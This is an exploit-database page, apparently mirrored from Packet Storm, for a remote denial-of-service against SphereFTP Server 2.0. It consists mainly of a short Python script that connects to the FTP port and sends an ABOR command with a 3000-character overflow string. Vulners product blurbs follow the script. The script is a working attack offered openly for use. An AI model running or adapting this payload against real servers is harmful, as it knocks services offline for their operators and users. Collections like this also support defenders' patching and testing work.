Lucene search
K

SphereFTP 2.0 Denial Of Service

🗓️ 01 Apr 2019 00:00:00Reported by Sachin WaghType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 70 Views

SphereFTP 2.0 Denial Of Service vulnerability exploi

Code
`#!/usr/bin/python  
# Exploit Title: SphereFTP Server v2.0 Remote Denial of Service  
Vulnerability  
# Date: 2019-31-03  
# Exploit Author: Sachin Wagh (@tiger_tigerboy)  
# Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip  
# Tested on: Windows 10 64-bit  
  
import socket  
import sys  
  
evil = "A"*3000  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
connect=s.connect(('192.168.56.1',21))  
  
s.recv(1024)  
s.send('ABOR '+evil+'\r\n')  
s.recv(1024)  
s.close  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation